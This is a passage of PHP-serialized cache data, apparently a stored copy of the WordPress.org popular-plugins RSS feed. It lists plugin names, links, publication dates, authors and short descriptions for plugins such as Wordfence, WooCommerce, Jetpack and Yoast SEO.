\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"29832@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"The Wordfence WordPress security plugin provides free enterprise-class WordPress security, protecting your website from hacks and malware.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Wordfence\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"TinyMCE Advanced\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wordpress.org/plugins/tinymce-advanced/#post-2082\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Jun 2007 15:00:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2082@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Enables the advanced features of TinyMCE, the WordPress WYSIWYG editor.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Andrew Ozz\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Super Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/wp-super-cache/#post-2572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2007 11:40:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2572@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"A very fast caching engine for WordPress that produces static html files.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Donncha O Caoimh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WP-PageNavi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wp-pagenavi/#post-363\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 23:17:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"363@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Adds a more advanced paging navigation interface.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Lester Chan\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WooCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"29860@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Hello Dolly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/hello-dolly/#post-5790\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 May 2008 22:11:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"5790@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"23862@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"Increase your traffic, view your stats, speed up your site, and protect yourself from hackers with Jetpack.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"NextGEN Gallery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/nextgen-gallery/#post-1169\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Apr 2007 20:08:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"1169@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"The most popular WordPress gallery plugin and one of the most popular plugins of all time with over 15 million downloads.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Alex Rabe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"18101@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"132@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Yoast SEO\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wordpress-seo/#post-8321\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Jan 2009 20:34:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"8321@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:114:\"Improve your WordPress SEO: Write better content and have a fully optimized WordPress site using Yoast SEO plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Joost de Valk\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Google Analytics by MonsterInsights\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/plugins/google-analytics-for-wordpress/#post-2316\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Sep 2007 12:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"2316@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"Connect Google Analytics with WordPress by adding your Google Analytics tracking code. Get the stats that matter.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Syed Balkhi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Page Builder by SiteOrigin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/siteorigin-panels/#post-51888\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Apr 2013 10:36:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"51888@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"Build responsive page layouts using the widgets you know and love using this simple drag and drop page builder.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Greg Priday\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Really Simple CAPTCHA\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/plugins/really-simple-captcha/#post-9542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2009 02:17:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"9542@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"Really Simple CAPTCHA is a CAPTCHA module intended to be called from other plugins. It is originally created for my Contact Form 7 plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Duplicate 